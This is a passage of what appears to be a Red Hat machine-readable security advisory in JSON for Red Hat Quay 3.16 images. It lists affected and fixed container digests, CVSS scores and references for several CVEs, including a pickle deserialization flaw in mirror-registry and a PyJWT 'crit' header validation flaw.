          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32590"
        },
        {
          "category": "external",
          "summary": "RHBZ#2446964",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2446964"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32590",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32590"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32590",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32590"
        }
      ],
      "release_date": "2026-04-08T00:00:00+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "HIGH",
            "attackVector": "NETWORK",
            "availabilityImpact": "HIGH",
            "baseScore": 7.1,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "privilegesRequired": "LOW",
            "scope": "UNCHANGED",
            "userInteraction": "REQUIRED",
            "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:R/S:U/C:H/I:H/A:H",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Moderate"
        }
      ],
      "title": "mirror-registry: remote code execution using pickle deserialization"
    },
    {
      "cve": "CVE-2026-32597",
      "cwe": {
        "id": "CWE-347",
        "name": "Improper Verification of Cryptographic Signature"
      },
      "discovery_date": "2026-03-12T22:01:29.967713+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
          ]
        }
      ],
      "ids": [
        {
          "system_name": "Red Hat Bugzilla ID",
          "text": "2447194"
        }
      ],
      "notes": [
        {
          "category": "description",
          "text": "A missing verification step has been discovered in PyJWT. PyJWT does not validate the crit (Critical) Header Parameter defined in RFC 7515 \u00a74.1.11. When a JWS token contains a crit array listing extensions that PyJWT does not understand, the library accepts the token instead of rejecting it. This violates the MUST requirement in the RFC.",
          "title": "Vulnerability description"
        },
        {
          "category": "summary",
          "text": "pyjwt: PyJWT accepts unknown `crit` header extensions (RFC 7515 \u00a74.1.11 MUST violation)",
          "title": "Vulnerability summary"
        },
        {
          "category": "general",
          "text": "The CVSS score(s) listed for this vulnerability do not reflect the associated product\u0027s status, and are included for informational purposes to better understand the severity of this vulnerability.",
          "title": "CVSS score applicability"
        }
      ],
      "product_status": {
        "fixed": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
        ],
        "known_not_affected": [
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
          "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le"
        ]
      },
      "references": [
        {
          "category": "self",
          "summary": "Canonical URL",
          "url": "https://access.redhat.com/security/cve/CVE-2026-32597"
        },
        {
          "category": "external",
          "summary": "RHBZ#2447194",
          "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2447194"
        },
        {
          "category": "external",
          "summary": "https://www.cve.org/CVERecord?id=CVE-2026-32597",
          "url": "https://www.cve.org/CVERecord?id=CVE-2026-32597"
        },
        {
          "category": "external",
          "summary": "https://nvd.nist.gov/vuln/detail/CVE-2026-32597",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-32597"
        },
        {
          "category": "external",
          "summary": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-752w-5fwx-jx9f",
          "url": "https://github.com/jpadilla/pyjwt/security/advisories/GHSA-752w-5fwx-jx9f"
        }
      ],
      "release_date": "2026-03-12T21:41:50.427000+00:00",
      "remediations": [
        {
          "category": "vendor_fix",
          "date": "2026-05-19T21:01:11+00:00",
          "details": "Before applying this update, make sure all previously released errata relevant\nto your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ],
          "restart_required": {
            "category": "none"
          },
          "url": "https://access.redhat.com/errata/RHSA-2026:19375"
        },
        {
          "category": "workaround",
          "details": "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "scores": [
        {
          "cvss_v3": {
            "attackComplexity": "LOW",
            "attackVector": "NETWORK",
            "availabilityImpact": "NONE",
            "baseScore": 7.5,
            "baseSeverity": "HIGH",
            "confidentialityImpact": "NONE",
            "integrityImpact": "HIGH",
            "privilegesRequired": "NONE",
            "scope": "UNCHANGED",
            "userInteraction": "NONE",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
            "version": "3.1"
          },
          "products": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:2fc63e77e837796a5082b58defffc6c46a9a4e8038190c9b8f87213bdf46c006_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:622a11babb195484a89cad806b9b79b6a99df53ad6ebb3d3d68b0a97ded78f79_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-rhel9@sha256:9e77748984103da9604314a20f66f4fe9710f645dec385b1069ea20d9d0c6ed1_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-bundle@sha256:631c61a88de857bac8503386173a7689c462cfa07141969beb1ab958d85996a3_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:2c5d16299741b7ebcb712479d5c82bb4fa498c6e043786abbff4c52b982c4879_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:74cda2cf2b38b3cd62e5527e421dd7fbe756350e326e0b385ad9518302e08f03_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-operator-rhel9@sha256:e77909a680cd9586f86b793363ffcba2352d25b2c255e7608582e6e7a6659ff2_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:139cae64e4790ebf8b760c6376a33d15233222a25e4da39c6062d7e46c3a1bef_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:52883f389182907dec0e286d626c4faea0f4ae29a5d0e841d6ad2287fdb964c2_arm64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:ad162e6ea2f6fd246f605180699ce36e4ea91c4b551c7af600a64e671a303ee9_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-rhel9@sha256:f6a15c2f1b4d5900cdbd366080e40d3a90d51ba9e5b4d6196e15eefe69d902c3_ppc64le"
          ]
        }
      ],
      "threats": [
        {
          "category": "impact",
          "details": "Important"
        }
      ],
      "title": "pyjwt: PyJWT accepts unknown `crit` header extensions (RFC 7515 \u00a74.1.11 MUST violation)"
    },
    {
      "cve": "CVE-2026-33186",
      "cwe": {
        "id": "CWE-551",
        "name": "Incorrect Behavior Order: Authorization Before Parsing and Canonicalization"
      },
      "discovery_date": "2026-03-20T23:02:27.802640+00:00",
      "flags": [
        {
          "label": "vulnerable_code_not_present",
          "product_ids": [
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:478f0e44eaf9907d18c8e765b16d80b9cc0bb3eac50ff8e118e3349aa29a9b46_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:4e7266596726edd7cde2b55bd7bed8910f4cbc1b310c11557e3552239ed3750f_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/clair-rhel9@sha256:f423a53dff70862980ee4381a9fe0fb5d19ce4d9932d7784491d057671d1fc2e_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-bundle@sha256:203097d7c260c95d7cf8e14a378542f75aae84f234a28d61d419f7b434562a9f_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:116b0249564f8424a5438e4a2edd0a9fa8c9449c4cea1ac1b642904d46dccf2f_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:68e02cfb3de2728a3f7f3cdd7b3ab231aa50ff51be51455bf1015ebc8addac66_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-bridge-operator-rhel9@sha256:f610987c52a000670dd5ba0a943f8d3ca38cdd71a0239a95b93260b4ce254b7b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-qemu-rhcos-rhel8@sha256:6c64c35079e0af57beeb1dec93cad23c91dbfca34d25ecdf6326cdf5d557e1b9_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:25be6b83e985ef60d32dec94f57f530b8a4be88c6f23627789f11eb4a0e8870b_amd64",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:34d0eac97f889384b67037fdf957e53c02c7ec2579e436e28f49b66d586062cf_ppc64le",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-builder-rhel9@sha256:8d71f18daf54d0311be34071b85d6f48c2895785c986e31a218cd748c443d60b_s390x",
            "Red Hat Quay 3.16:registry.redhat.io/quay/quay-container-security-operator-bundle@sha256:ae76dd5965cf14d53a81b5e88ec2f9406d12834a8f5fb1f3ee14fc3271ecceee_amd64",
